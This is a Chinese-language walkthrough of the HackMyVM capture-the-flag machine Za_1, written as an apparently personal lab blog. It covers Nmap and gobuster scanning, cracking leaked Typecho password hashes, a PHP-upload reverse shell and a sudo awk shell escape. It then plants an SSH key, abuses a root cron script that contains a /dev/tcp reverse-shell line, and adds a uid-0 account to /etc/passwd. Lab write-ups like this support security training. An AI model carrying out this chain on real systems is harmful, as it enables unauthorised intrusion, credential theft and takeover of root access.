hack-my-vm:Za_1

SunRT

2025-01-21

HACK-MY-VM

hack-my-vm:Za_1

端口探测

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.29                                                                                                           [18:01:55]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 18:02 CST
Nmap scan report for 192.168.1.29
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1E:E9:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds

80端口渗透

kali@kali [~] ➜  gobuster  dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.29               [18:02:21]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.29
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 312] [--> http://192.168.1.29/admin/]
/install              (Status: 301) [Size: 314] [--> http://192.168.1.29/install/]
/sql                  (Status: 301) [Size: 310] [--> http://192.168.1.29/sql/]
/var                  (Status: 301) [Size: 310] [--> http://192.168.1.29/var/]
/usr                  (Status: 301) [Size: 310] [--> http://192.168.1.29/usr/]
/server-status        (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

初步访问确定是一个博客网站，发现/admin是一个登录入口，sql注入没有测试，先去别的目录下看看有没有文件泄露，在/sql目录下发现了遗留的sql文件

kali@kali [~] ➜  wget http://192.168.1.29/sql/new.sql                                                                                       [18:07:25]
--2025-01-21 18:07:50--  http://192.168.1.29/sql/new.sql
正在连接 192.168.1.29:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：102400 (100K) [application/x-sql]
正在保存至: “new.sql”

new.sql                               100%[========================================================================>] 100.00K  --.-KB/s  用时 0.003s  

2025-01-21 18:07:50 (33.9 MB/s) - 已保存 “new.sql” [102400/102400])

下载并查看该文件，发现暴漏了版本

用SQLLite3打开，查询即可

kali@kali [~] ➜  sqlite3 new.sql                                                                                                                 [18:12:08]
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
typechocomments       typechometas          typechousers        
typechocontents       typechooptions      
typechofields         typechorelationships
sqlite> select * from typechocomments;
1|1|1690361071|Typecho|0|1||https://typecho.org|127.0.0.1|Typecho 1.2.1|欢迎加入 Typecho 大家族|comment|approved|0
sqlite> select * from typechometas;
1|默认分类|default|category|只是一个默认分类|1|0|0
sqlite> select * from typechousers;
1|zacarx|$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.|zacarx@qq.com|http://www.zacarx.com|zacarx|1690361071|1692694072|1690364323|administrator|9ceb10d83b32879076c132c6b6712318
2|admin|$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0|admin@11.com||admin|1690364171|1690365357|1690364540|administrator|5664b205a3c088256fdc807791061a18
sqlite>

泄露了管理员的密码，直接拿出去爆破

kali@kali [~] ➜  john -w=/usr/share/wordlists/rockyou.txt x                                                                                      [18:21:03]
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (?)     
1g 0:00:00:00 DONE (2025-01-21 18:21) 50.00g/s 19200p/s 19200c/s 19200C/s 123456..michael1
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

是弱密码，感觉像白忙活了，登录后台，上传文件

先加上.php，才可以保证能够上传

监听端口，获取反弹shell

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [18:28:46]
listening on [any] 8888 ...
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.29] 56010
bash: cannot set terminal process group (1256): Inappropriate ioctl for device
bash: no job control in this shell
www-data@za_1:/var/www/html/usr/uploads/2025/01$ whoami
whoami
www-data
www-data@za_1:/var/www/html/usr/uploads/2025/01$

提权

www-data@za_1:/var/www/html/usr/uploads/2025/01$ sudo -l
sudo -l
Matching Defaults entries for www-data on za_1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on za_1:
    (za_1) NOPASSWD: /usr/bin/awk
www-data@za_1:/var/www/html/usr/uploads/2025/01$

发现一个sudo以za_1用户无密码执行的文件，awk可以执行命令的，直接提权

www-data@za_1:/var/www/html/usr/uploads/2025/01$ sudo -u za_1 /usr/bin/awk 'BEGIN {system("/bin/sh")}'
<do -u za_1 /usr/bin/awk 'BEGIN {system("/bin/sh")}'
id
uid=1000(za_1) gid=1000(za_1) groups=1000(za_1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
whoami
za_1

但是shell的交互性太差了，我们直接将自己的[kali]公钥写进去，远程连接

cd /home/za_1
cd .ssh
ls
authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com'> authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com

远程连接

kali@kali [~] ➜  ssh za_1@192.168.1.29                                                                                                           [18:36:07]
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ED25519 key fingerprint is SHA256:oSJ0TcpNx9A3oiP98T03MZQ2oihLUNvFsNtehmlqYug.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:13: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.29' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 21 10:36:12 UTC 2025

  System load:  0.0                Processes:             108
  Usage of /:   21.4% of 19.52GB   Users logged in:       0
  Memory usage: 19%                IP address for enp0s3: 192.168.1.29
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

41 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Wed Jul 26 07:19:41 2023 from 10.0.2.18
za_1@za_1:~$ ls
user.txt
za_1@za_1:~$

查看该用户下有没有泄露敏感信息

za_1@za_1:~$ ls -la
total 44
drwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .
drwxr-xr-x 3 root root 4096 Jul 26  2023 ..
lrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -> /dev/null
-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc
drwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache
drwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg
-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile
drwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root
drwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh
-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful
-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt
-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo
za_1@za_1:~$ cd .root/
za_1@za_1:~/.root$ ls -la 
total 12
drwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .
drwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 ..
-rwxrwxrwx 1 root root  117 Jul 26  2023 back.sh
za_1@za_1:~/.root$ cat back.sh 
#!/bin/bash


cp /var/www/html/usr/64c0dcaf26f51.db /var/www/html/sql/new.sql

bash -i >&/dev/tcp/10.0.2.18/999 0>&1

发现一个.root的隐藏目录，里面有一个可执行文件，我们有写入的权限，但是该文件不是SUID/SGID，猜测是一个计划进程，pspy64跑一下

za_1@za_1:~/.root$ cd /tmp/
za_1@za_1:/tmp$ wget http://192.168.1.4:8000/pspy64
--2025-01-21 10:42:18--  http://192.168.1.4:8000/pspy64
Connecting to 192.168.1.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                 100%[============================================================================>]   2.96M  --.-KB/s    in 0.07s   

2025-01-21 10:42:18 (43.3 MB/s) - ‘pspy64’ saved [3104768/3104768]

za_1@za_1:/tmp$ chmod +x pspy64 
za_1@za_1:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
2025/01/21 10:42:38 CMD: UID=1000  PID=2825   | ./pspy64 
2025/01/21 10:42:38 CMD: UID=0     PID=2820   | /bin/bash /home/za_1/.root/back.sh 
2025/01/21 10:42:38 CMD: UID=0     PID=2818   | /bin/bash /home/za_1/.root/back.sh 
2025/01/21 10:42:38 CMD: UID=0     PID=2817   | /bin/sh -c /bin/bash /home/za_1/.root/back.sh 
2025/01/21 10:42:38 CMD: UID=0     PID=2815   | /usr/sbin/CRON -f 
2025/01/21 10:42:38 CMD: UID=0     PID=2812   | /bin/bash /home/za_1/.root/back.sh 
2025/01/21 10:42:38 CMD: UID=0     PID=2810   | /bin/bash /home/za_1/.root/back.sh 
2025/01/21 10:42:38 CMD: UID=0     PID=2809   | /bin/sh -c /bin/bash /home/za_1/.root/back.sh 
2025/01/21 10:42:38 CMD: UID=0     PID=2808   | /usr/sbin/CRON -f

发现这个文件过一会就会运行，没错，应该就是计划进程，我们写入代码chmod 777 /etc/passwd,稍后查看该文件权限，写入一个新的root用户

za_1@za_1:/tmp$ cd /home/za_1/.root/
za_1@za_1:~/.root$ nano back.sh 
za_1@za_1:~/.root$ cat back.sh 
#!/bin/bash


cp /var/www/html/usr/64c0dcaf26f51.db /var/www/html/sql/new.sql

bash -i >&/dev/tcp/10.0.2.18/999 0>&1

chmod 777 /etc/passwd
za_1@za_1:~/.root$ ls -la /etc/passwd
-rwxrwxrwx 1 root root 1613 Jul 26  2023 /etc/passwd
za_1@za_1:~/.root$ openssl passwd 123
I2HY8i2gi7MFE
za_1@za_1:~/.root$ nano /etc/passwd
za_1@za_1:~/.root$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
za_1:x:1000:1000:Zacarx:/home/za_1:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
sunrt:I2HY8i2gi7MFE:0:0:root:/root:/bin/bash

切换用户提权

za_1@za_1:~/.root$ su - sunrt
Password: 
root@za_1:~# whoami
root
root@za_1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@za_1:~#